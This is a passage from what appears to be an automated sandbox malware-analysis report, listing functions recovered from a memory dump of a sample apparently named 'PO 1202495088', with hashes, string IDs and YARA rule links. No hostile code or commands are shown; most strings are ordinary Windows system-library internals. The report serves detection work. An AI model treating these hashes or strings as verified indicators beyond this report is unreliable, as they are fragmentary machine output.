                                                                                          • Opcode ID: e9a0b4d6c6809ed08af7fad5ee0660930bc4eeedfe231b2930791db33cd4cee4
                                                                                          • Instruction ID: b37745bca911bb129d56cebd9054d6d70b8950b2d53c8fcaa81f87560f22820f
                                                                                          • Opcode Fuzzy Hash: e9a0b4d6c6809ed08af7fad5ee0660930bc4eeedfe231b2930791db33cd4cee4
                                                                                          • Instruction Fuzzy Hash: FE41B032604211ABCB21CF59D940AA7BBE4AFEC654B0E067FED9897376D730DC018B91
                                                                                          Function 01464D00 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-964947082
                                                                                          • Opcode ID: c13c8d33aee7c65cbecf2310dd58dbcd533025670d2e3bd0166d42ee6ff5bb9b
                                                                                          • Instruction ID: ee7bf92082df177601b582961a6f2603284de3b087f01368fbd35a6b3996ee5b
                                                                                          • Opcode Fuzzy Hash: c13c8d33aee7c65cbecf2310dd58dbcd533025670d2e3bd0166d42ee6ff5bb9b
                                                                                          • Instruction Fuzzy Hash: 69410272A04345AFEF61DF58E880A667FACEB54728F49042EEA0597271C730E885CB52
                                                                                          Function 013C0ACE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-2558761708
                                                                                          • Opcode ID: 046de7100146cfc7ee54bd4345de0c622515b7e60f020c636b5ea886335c115e
                                                                                          • Instruction ID: c25344fe911dd33492bde874eaaa74173515e33ab1cb6dbaba54c5e75a808bc3
                                                                                          • Opcode Fuzzy Hash: 046de7100146cfc7ee54bd4345de0c622515b7e60f020c636b5ea886335c115e
                                                                                          • Instruction Fuzzy Hash: 0911C036355142DFE719DB18D494BBAB7A9EF91A18F18451EF406CF265DA30D841CB40
                                                                                          Function 013BA8F0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrResSearchResource Enter, xrefs: 013BA933
                                                                                          • LdrResSearchResource Exit, xrefs: 013BA945
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                          • API String ID: 0-4066393604
                                                                                          • Opcode ID: a2fdddfefda0fec269eea3e108dbf2652ea0b0356c19c73f35fcb48c5a0be0ac
                                                                                          • Instruction ID: ae7816519cca424873e3c21f92620b1b90691e6c1c78a36377517bf43724f6e8
                                                                                          • Opcode Fuzzy Hash: a2fdddfefda0fec269eea3e108dbf2652ea0b0356c19c73f35fcb48c5a0be0ac
                                                                                          • Instruction Fuzzy Hash: 9BE19271A006599FEF21CE99C990BEEBBB9BF04318F20402AEA01E7655E774D941DB60
                                                                                          Function 01452AE0 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 01452B91
                                                                                          • , xrefs: 01452E38
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                          • API String ID: 0-4088147954
                                                                                          • Opcode ID: c065d299cef7439fc3e6b2610df69823fb96b96b08f5258a21f2ab81a2fbdbe9
                                                                                          • Instruction ID: f363399a93fb54ad96b3a065ff38ecad4fafc1f60a8efcaf3b401a3c81e849e2
                                                                                          • Opcode Fuzzy Hash: c065d299cef7439fc3e6b2610df69823fb96b96b08f5258a21f2ab81a2fbdbe9
                                                                                          • Instruction Fuzzy Hash: 10C18A71608302DBD765CF59C480B2BBBE5AF98314F04491FEE849B362E7B0D946CB92
                                                                                          Function 0142E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Legacy$UEFI
                                                                                          • API String ID: 2994545307-634100481
                                                                                          • Opcode ID: 605524256b296eb2d01391d4a50723998428b4013fdfd5bea8afb254312ac391
                                                                                          • Instruction ID: e0ba53597b1d2b67c05570d4a546ce0878fa1bcc1bb1075ef448c4861fa93e86
                                                                                          • Opcode Fuzzy Hash: 605524256b296eb2d01391d4a50723998428b4013fdfd5bea8afb254312ac391
                                                                                          • Instruction Fuzzy Hash: 49619F71A003199FDB24DFA9C840BAEBBB4FF04744F54402EE649EB261E730E981CB50
                                                                                          Function 013BAB70 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpResGetMappingSize Exit, xrefs: 013BAB9C
                                                                                          • LdrpResGetMappingSize Enter, xrefs: 013BAB8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                          • API String ID: 0-1497657909
                                                                                          • Opcode ID: 6e86d2d05b3124b3fb0ee887ff9c7091242881bdba23a4ba2375eb10d4069873
                                                                                          • Instruction ID: 6dd57b0b699e4a429732b928e19339f3d7f1d2489bee2596b2a88b2744ea87e9
                                                                                          • Opcode Fuzzy Hash: 6e86d2d05b3124b3fb0ee887ff9c7091242881bdba23a4ba2375eb10d4069873
                                                                                          • Instruction Fuzzy Hash: 4D61A171A04A499FEF12CF6DC880BEABBB5BF54718F04405AEA01EBB95E774D940C750
                                                                                          Function 013E4B79 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$Flst
                                                                                          • API String ID: 0-758220159
                                                                                          • Opcode ID: 479952a09cc1ffeef8cf5eb8eca0e769e392ab573ba3737835555a2b596f77b0
                                                                                          • Instruction ID: 8d91d0af89e6bff94ff859841f90188d20e47e798cb7a1c37d8bfc824cbf6c70
                                                                                          • Opcode Fuzzy Hash: 479952a09cc1ffeef8cf5eb8eca0e769e392ab573ba3737835555a2b596f77b0
                                                                                          • Instruction Fuzzy Hash: 78518BB1A007299BDF26CF99C588769FBF4FF48718F54806AD045DB2A5E7709981CB80
                                                                                          Function 013B0485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013B0586
                                                                                          • kLsE, xrefs: 013B05FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                          • API String ID: 0-2547482624
                                                                                          • Opcode ID: cbb5ed40764261fcb081dbaea8ce14871dbed65ff933a23af734287eeaee059d
                                                                                          • Instruction ID: 3c95d5d1a92cd6b0272b9a439dd496b125ff40f7cb84e7e34a12a71a1951d929
                                                                                          • Opcode Fuzzy Hash: cbb5ed40764261fcb081dbaea8ce14871dbed65ff933a23af734287eeaee059d
                                                                                          • Instruction Fuzzy Hash: 84519F71A0474ADFDB28DFA9C4806EBB7F8AF44308F10483FE69693E51E6349505CB61
                                                                                          Function 013E2DBC Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 01422616
                                                                                          • RtlpInsertAssemblyStorageMapEntry, xrefs: 01422611
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                          • API String ID: 0-2104531740
                                                                                          • Opcode ID: 4f2fee800388b9059388000660e19d8935c90a7a455b172601afd4accd18653f
                                                                                          • Instruction ID: 9be56e2569a7e81c5324778ee4255d1a200ea8ddcd146245a0af5a74b8098db7
                                                                                          • Opcode Fuzzy Hash: 4f2fee800388b9059388000660e19d8935c90a7a455b172601afd4accd18653f
                                                                                          • Instruction Fuzzy Hash: ED41C272600225ABDB25CF49C850E7BB7A9FF94B10F55C02EEA499B750D7B0D9C1CB90
                                                                                          Function 013BA1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA229
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA21B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          • API String ID: 0-2876891731
                                                                                          • Opcode ID: 2b918a1333d77611f49b5ff9ca7bcd19f9cd7d17d4b93903ac1071256f16e0f2
                                                                                          • Instruction ID: de8327150f0029b979695fa824ab592747b57b039bb58ac23d96d1472fed158f
                                                                                          • Opcode Fuzzy Hash: 2b918a1333d77611f49b5ff9ca7bcd19f9cd7d17d4b93903ac1071256f16e0f2
                                                                                          • Instruction Fuzzy Hash: 0141AE30B00A559BDB15CF5DC480BAABBB5FF45748F2480A6EA04DF7A5F676D900CB10
                                                                                          Function 01430443 Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F*;h$F*;h(
                                                                                          • API String ID: 0-866237618
                                                                                          • Opcode ID: 87628274ec46300a7697ee777c9115313c5edfd8d6433f385a5c4f0b6e70be13
                                                                                          • Instruction ID: c92b86838491ba141f4885032f000ec7ac545746d700452d81e7c81278e60bf0
                                                                                          • Opcode Fuzzy Hash: 87628274ec46300a7697ee777c9115313c5edfd8d6433f385a5c4f0b6e70be13
                                                                                          • Instruction Fuzzy Hash: 39417171504311AFD720DF29C844B9BBBE8FF98764F004A2EF998D72A1D7709905CB92
                                                                                          Function 0144AA40 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0144AABF
                                                                                          • F*;h(, xrefs: 0144AAD7, 0144AAFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F*;h($NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                          • API String ID: 0-193314022
                                                                                          • Opcode ID: b95ff0efd5dd5ef8bdf49c9550256d44c81419ea317cf6647248f314332a3062
                                                                                          • Instruction ID: afeb86e0e793a5d4e5be4c6123e324d2b14c2ce8675227825dcf2589c9be4c9c
                                                                                          • Opcode Fuzzy Hash: b95ff0efd5dd5ef8bdf49c9550256d44c81419ea317cf6647248f314332a3062
                                                                                          • Instruction Fuzzy Hash: ED316972A40648AFEB11CF59CD00F5BBBB5FB84B10F25852AF601A37A0C738A800CB90
                                                                                          Function 013EA4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                          • API String ID: 2994545307-4008356553
                                                                                          • Opcode ID: 97f58bb1158eb27688e4354b24a177157a484e8cf2609a4208ccaed6eec6333b
                                                                                          • Instruction ID: e0359c911c4b9d5aa0d6a1c88fb1263b9b7472141a0ac51bdd74cb5917e6ff5c
                                                                                          • Opcode Fuzzy Hash: 97f58bb1158eb27688e4354b24a177157a484e8cf2609a4208ccaed6eec6333b
                                                                                          • Instruction Fuzzy Hash: AB01D1B2250704EFD311DF14CE09B127BE8E780B19F05897AE698C75D0E734D900CB45
                                                                                          Function 013BC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MUI
                                                                                          • API String ID: 0-1339004836
                                                                                          • Opcode ID: f67fb6fa534a86a295dcafa1e68e3b03b75404abbd3016da3013175fbd58a9cd
                                                                                          • Instruction ID: 058eaabdb586542bcedbeed7d3ad1b1e7589275b13f3ce106dfaf408679a69be
                                                                                          • Opcode Fuzzy Hash: f67fb6fa534a86a295dcafa1e68e3b03b75404abbd3016da3013175fbd58a9cd
                                                                                          • Instruction Fuzzy Hash: A5824C75E002099FEB25CFA9C8C07EDBBB5FF48318F148169EA59ABA51E7309D41CB50
                                                                                          Function 0144C7B0 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w
                                                                                          • API String ID: 0-476252946
                                                                                          • Opcode ID: 4a866be153d020ee1379ec65855434243f73db2a947791bf6bf3ff3b9f1e553e
                                                                                          • Instruction ID: 07c1fb3f64ca38ee41ab8098cc4b7e90482aaad293b8a8b9183765890e05113b
                                                                                          • Opcode Fuzzy Hash: 4a866be153d020ee1379ec65855434243f73db2a947791bf6bf3ff3b9f1e553e
                                                                                          • Instruction Fuzzy Hash: 71D1CC30901256ABEB24CF58C481ABFBBF1FF44704F18C45AE899AB351E735E982D790
                                                                                          Function 014547B4 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: f17404ab1f35dd1fedc509417887bc5ab96c5c688d223678ddbb8f94fe13081d
                                                                                          • Instruction ID: 297ef16b80d21f1fe5a3be6feb7d836191a4c47526f913c89aaa8a1f324474c7
                                                                                          • Opcode Fuzzy Hash: f17404ab1f35dd1fedc509417887bc5ab96c5c688d223678ddbb8f94fe13081d
                                                                                          • Instruction Fuzzy Hash: 70A16571A0024A9FDF95DF98C881AAFBBB8EF14744F18402AEE11AB351E7709D81CB54
                                                                                          Function 014360A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: 0ad4afd3f775aa306e358523739138252f1fce4c487f7851687ac64125a5884f
                                                                                          • Instruction ID: c661215d2c6c95c4e005976af7175b0f02aba25f846280c348b13bca0f14cf9b
                                                                                          • Opcode Fuzzy Hash: 0ad4afd3f775aa306e358523739138252f1fce4c487f7851687ac64125a5884f
                                                                                          • Instruction Fuzzy Hash: AB918472940216BFEB21DF99DD85FAE7BB8EF49714F150056F600AB291DB71AD00CBA0
                                                                                          Function 013EA580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalTags
                                                                                          • API String ID: 0-1106856819
                                                                                          • Opcode ID: 80864776339702be193f4c0ba9685cb568df68770769d9c7b64453af01e1e8bf
                                                                                          • Instruction ID: a10124c91cb212dc4f513dcd6eb54b53fb2ff5523b317c3c50f091ec01d7cba4
                                                                                          • Opcode Fuzzy Hash: 80864776339702be193f4c0ba9685cb568df68770769d9c7b64453af01e1e8bf
                                                                                          • Instruction Fuzzy Hash: C4716B75E0022A9BDF24CF9CD5806AEBBF2BF58610F55812EE905A7365EB318981CB50
                                                                                          Function 013C02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #%u
                                                                                          • API String ID: 0-232158463
                                                                                          • Opcode ID: 4b98d02a519f5e7bcdab5a2b022aa6c275604e4183185668dcc0ad3e25cbde4d
                                                                                          • Instruction ID: 8c6e63c781fdd18ba3289bad11fe40d6d222292d5b731cdaf97ee5ade7329fd3
                                                                                          • Opcode Fuzzy Hash: 4b98d02a519f5e7bcdab5a2b022aa6c275604e4183185668dcc0ad3e25cbde4d
                                                                                          • Instruction Fuzzy Hash: 7E715B71A0014ADFDB05DFA9C984BAEB7F8BF18708F14406AE905E7265EB34ED45CB60
                                                                                          Function 014544F8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .mui
                                                                                          • API String ID: 0-1199573805
                                                                                          • Opcode ID: c2f1ee60b26f66cdf975137a19823d418b6c31b4a1e6b37579798f413f02b6b3
                                                                                          • Instruction ID: f7def038eee9f13aa02028670aaa4a7ef5d1fc6d041d8b607da672c5904c59e2
                                                                                          • Opcode Fuzzy Hash: c2f1ee60b26f66cdf975137a19823d418b6c31b4a1e6b37579798f413f02b6b3
                                                                                          • Instruction Fuzzy Hash: 0351BB71D00229DBDF51DF99C840AAEB7B4AF18A14F09412AEF05AF751E7389D41CBA0
                                                                                          Function 013CE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EXT-
                                                                                          • API String ID: 0-1948896318
                                                                                          • Opcode ID: 2d91c4ed7a6a20880882010464c90a6069364d68a705201b5b9d572f7e4ba87a
                                                                                          • Instruction ID: ba918946a2ff68f682958ee5d7b87132b335d88b6949c50ca0b69621df91895a
                                                                                          • Opcode Fuzzy Hash: 2d91c4ed7a6a20880882010464c90a6069364d68a705201b5b9d572f7e4ba87a
                                                                                          • Instruction Fuzzy Hash: 634184725143129BD710DB69C844B6BBBE8AF88B2CF44093DF584E7240EB74DD048796
                                                                                          Function 013E41BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                          • Instruction ID: e3493fd5504f5388c8215c867e4ad80e0eda871d81048c9610130d078ca2cb04
                                                                                          • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                          • Instruction Fuzzy Hash: B051AC71200711AFC320CF19C840A6BBBF8FF48B14F00892EFA95976A0E7B4E954CB91
                                                                                          Function 0143CB20 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: bf4e430f8019df92a1d741344693256bde56f58eb05be3bd9ce072bbf9190a78
                                                                                          • Instruction ID: 9edda1760d92af2b171ce755f8e73ee2e2c1e99dce2de8acfa08216f0dc39e52
                                                                                          • Opcode Fuzzy Hash: bf4e430f8019df92a1d741344693256bde56f58eb05be3bd9ce072bbf9190a78
                                                                                          • Instruction Fuzzy Hash: 5441BE71A00215DFDB219F99D880AAEBBB8FF68B04F15402FE905EB3A4E774D841CB50
                                                                                          Function 0142C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryHash
                                                                                          • API String ID: 0-2202222882
                                                                                          • Opcode ID: 00912fb58427693bb31efcde55cc279905dff3fd7f3bd65c103d5d5732f95ac3
                                                                                          • Instruction ID: 95547c84dca6669c8d0f58177ce1f3a60fb99d48ac9dcfa5698f5407a38c72c6
                                                                                          • Opcode Fuzzy Hash: 00912fb58427693bb31efcde55cc279905dff3fd7f3bd65c103d5d5732f95ac3
                                                                                          • Instruction Fuzzy Hash: 924122B1D0052DAADB21DA54CC84FDFB77CAB54718F4045EAEB08A7151DB709E888FA4
                                                                                          Function 01456BDE Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kLsE
                                                                                          • API String ID: 0-3058123920
                                                                                          • Opcode ID: 8886f79ece16992ad6e778ebfd83a543c6dca5f8f2585ce53e01c3261007afa1
                                                                                          • Instruction ID: b0803c9bef9aa76cfe49bc306aa51b2f7ebd722cf7e5a6bbb16a2481899ad100
                                                                                          • Opcode Fuzzy Hash: 8886f79ece16992ad6e778ebfd83a543c6dca5f8f2585ce53e01c3261007afa1
                                                                                          • Instruction Fuzzy Hash: DA412A3190135146E331EB6DA8847E63E94EB50768F9F011FEE544E1FADBB44886C7A1
                                                                                          Function 0142C920 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TrustedInstaller
                                                                                          • API String ID: 0-565535830
                                                                                          • Opcode ID: 68e708422dbfa4a2ef55f5bd9b43e8f4bf4317f5ada1f2e6c5eabaf2e119629a
                                                                                          • Instruction ID: 1235ec20c5a30e80249f0f17c62da96055d794f6c191bb1f7f2167d85171bed5
                                                                                          • Opcode Fuzzy Hash: 68e708422dbfa4a2ef55f5bd9b43e8f4bf4317f5ada1f2e6c5eabaf2e119629a
                                                                                          • Instruction Fuzzy Hash: D8319832940229BBDB22DB98CC54FEFBB78EB54754F40016AFA00E7260D670DE45C790
                                                                                          Function 014466D0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                          Download Yara Rule
